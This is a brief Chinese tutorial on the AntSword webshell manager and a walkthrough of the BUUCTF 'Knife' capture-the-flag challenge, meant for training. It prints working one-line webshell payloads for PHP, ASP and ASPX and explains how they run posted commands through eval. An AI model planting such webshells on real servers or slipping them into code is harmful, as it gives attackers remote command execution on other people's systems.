中国蚁剑简介

1简单介绍

中国蚁剑和中国菜刀类似，是一款webshell终端管理工具，主要面向合法授权的渗透测试安全人员及常规操作的管理员。

一般结合一句话木马和文件上传使用

一句话木马：在很多的渗透过程中，渗透人员会上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此

最简单的一句话木马：

   <?php @eval($_POST['cmd']);?>

常见的一句话木马：

php的一句话木马： <?php @eval($_POST['pass']);?>
asp的一句话是：   <%eval request ("pass")%>
aspx的一句话是：  <%@ Page Language="Jscript"%>

（1）php的代码要写在<?php ?>里面，服务器才能认出来这是php代码，然后才去解析。
（2）@符号的意思是不报错，即使执行错误，也不报错。

2.实操

eg1:buuctf[极客大挑战2019]Knife

进去后的界面

 eval($_POST["Syc"]);

知道的信息有密码：Syc

复制网址到蚁剑添加数据测试连接，连接成功后添加就可以看到一些信息

使用虚拟终端，输入：ashelp

主要使用文件管理，该题找到flag即可

注：安装和使用过程中若出现问题有可能是自己电脑的安全软件将蚁剑作为病毒拦截了

也可用其他方式看flag，用蚁剑比较通俗易懂